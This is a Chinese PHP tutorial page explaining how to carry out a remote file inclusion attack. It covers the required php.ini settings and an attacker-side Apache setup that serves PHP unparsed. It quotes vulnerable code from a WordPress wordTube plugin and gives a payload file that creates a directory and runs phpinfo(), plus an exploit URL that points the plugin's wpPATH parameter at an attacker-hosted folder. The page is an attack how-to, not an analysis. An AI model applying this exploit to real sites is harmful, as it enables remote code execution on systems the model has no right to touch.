微信公众号 讲师中心
首页
文章
后端开发 web前端 数据库 开发工具 php框架 常见问题 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 自媒体 新闻
专题
后端开发 web前端 数据库 开发工具 php框架 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 新闻
AI工具
AI 聊天问答 Agent智能体 AI 文本写作 AI 绘画作图 AI 设计工具 AI 视频创作 AI 音频制作 AI 办公学习 AI 编程开发 Prompt指令
学习
大前端 后端开发 数据库 移动端 运维开发 计算机基础
编程手册
大前端 后端开发 数据库 移动端 运维开发 计算机基础
下载
js特效 网站源码 工具下载 类库下载 网站素材 学习资源 插件扩展 手机/移动开发 手机游戏
搜索
后端开发 web前端 数据库 开发工具 php框架 常见问题 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程
自媒体 新闻
首页 > 后端开发 > php教程 > 正文

修改部分php配置实现 远程包含 攻击

php中文网
发布: 2016-06-23 14:37:31
原创
1291人浏览过

1. 调试期间,可以打开display_errors = On

2. 目标机使用了include、require或require_once

3. 目标机配置

  a) register_globals = On

  b) allow_url_fopen = On

  c) allow_url_include = On

这样的目标就可以进行攻击了

自己搭建简易的服务器,apache + php 即可

修改httpd.conf中,将后缀为php的,从而避免代码在攻击端就被执行,

#AddType application/x-httpd-php .php .html .htm

根据漏洞代码,生成对应的环境,例如:

if (!$_POST) $wppath=$_GET['wpPATH'];

else $wppath=$_POST['wpPATH'];

require_once($wppath.'/wp-config.php');

我们就可以建立一个可访问的文件夹bad_guy,

增加读权限order allow,deny allow from all ,

然后在里面新建一个wp-config.php 

<?php        mkdir('c:\exploit');        phpinfo();        exit;?>
登录后复制

~然后请求一下就行了

/wordpress/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://10.67.1.30/bad_guy

来张效果图:

图改改
图改改

在线修改图片文字

图改改 455
查看详情 图改改

大家都在看:

PHP速学教程(入门到精通)
PHP速学教程(入门到精通)

PHP怎么学习?PHP怎么入门?PHP在哪学?PHP怎么学才快?不用担心,这里为大家提供了PHP速学教程(入门到精通),有需要的小伙伴保存下载就能学习啦!

下载
来源:php中文网
收藏 点赞
上一篇:PHP中file_get_contents函数获取带BOM的utf-8,然后json_decode() 返回null的问题 下一篇:PHP CSV导入数据库
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
php怎么用input_PHP表单input数据获取与处理方法 使用$_POST、$_GET、filter_input等方法可安全获取表单数据,结合验证与过滤确保输入有效且防攻击。
2025-11-10 05:29:22
827
怎样从一个字符串中安全地提取数字_正则表达式与类型转换方法 答案:采用正则表达式结合类型转换可安全准确提取字符串中的数值。首先使用re.findall()匹配数字模式,区分整数r‘\b\d+\b’与浮点数r‘[-+]?(?:\d+.\d+|\d*.\d+|\d+.)’,提取后分别用int()或float()转换,并通过try-except处理异常;预清理可用re.sub()去除符号干扰,确保数据完整性。
2025-11-10 03:49:14
795
php工具如何优化前端资源加载_php工具Web性能的调优策略 PHP可通过合并压缩CSS/JS、生成带哈希的资源链接、按需加载及输出缓存控制等手段优化前端资源加载,结合CDN与合理缓存策略,显著提升页面加载速度与Web性能。
2025-11-10 02:49:17
710
php代码如何使用面向对象编程_php代码OOP思想的实战应用 采用OOP可提升PHP代码的可维护性和复用性,本文介绍类与对象、构造析构函数、继承重写、封装控制、静态成员及接口多态六大核心特性,助力结构化开发。
2025-11-10 01:45:36
577
如何搭建WAMP环境以支持PHP开发的详细教程? 首先下载并安装WAMPServer,启动服务后通过访问http://localhost验证运行状态,接着配置网站根目录与虚拟主机以支持多站点开发,然后通过phpMyAdmin管理MySQL数据库,最后创建test.php文件并访问以确认PHP解析功能正常。
2025-11-10 01:13:20
696
PHP如何获取当前日期和时间_PHP的date函数格式化日期时间详解 答案:使用PHP的date()函数可格式化输出当前时间,如date("Y-m-dH:i:s")返回"2025-04-0514:30:22";需调用date_default_timezone_set("Asia/Shanghai")设置时区以确保准确;常用格式符包括Y、m、d、H、i、s等;也可结合time()获取时间戳或使用DateTime类进行更灵活的日期操作。
2025-11-09 23:59:07
836
php怎么用浏览器打开_PHP文件浏览器打开方法教程 PHP需服务器解析,直接打开会显示源码;02.安装XAMPP并启动Apache,将文件放入htdocs,通过http://localhost访问;03.VSCode可安装PHPServer插件右键运行;04.命令行执行php-Slocalhost:8000启动内置服务器预览。
2025-11-09 23:51:02
497
PHP代码怎么重构_PHP代码重构技巧及代码质量提升。 重构可提升PHP代码质量,通过提取函数实现类职责分离,增强可读性;应用工厂模式、依赖注入等设计模式优化结构;采用PSR-4命名空间与composer自动加载提升模块化;提取重复代码与常量降低维护成本;启用严格类型声明减少运行时错误。
2025-11-09 23:39:03
550
php代码图片处理慢怎么解决_php代码图片处理性能优化与加速技巧 使用ImageMagick替代GD、启用文件缓存与Redis状态记录、优化采样算法和内存释放、提升PHP内存限制并部署SSD服务器,可显著加快PHP图片处理速度。
2025-11-09 23:37:39
143
php程序怎么部署到slimapi_php程序slimapi轻量接口部署与运行环境配置方法 部署PHP程序到SlimAPI框架需先配置PHP7.4+、Web服务器及Composer,再通过Composer安装Slim并创建入口文件,配置Nginx或Apache重写规则,最后启动服务测试接口,建议优化安全设置。
2025-11-09 23:34:03
336
相关专题
更多>
热门推荐
开源免费商场系统广告
热门教程
更多>
相关推荐
热门推荐
最新课程
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新 English
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号

  • PHP学习

  • 技术支持

  • 返回顶部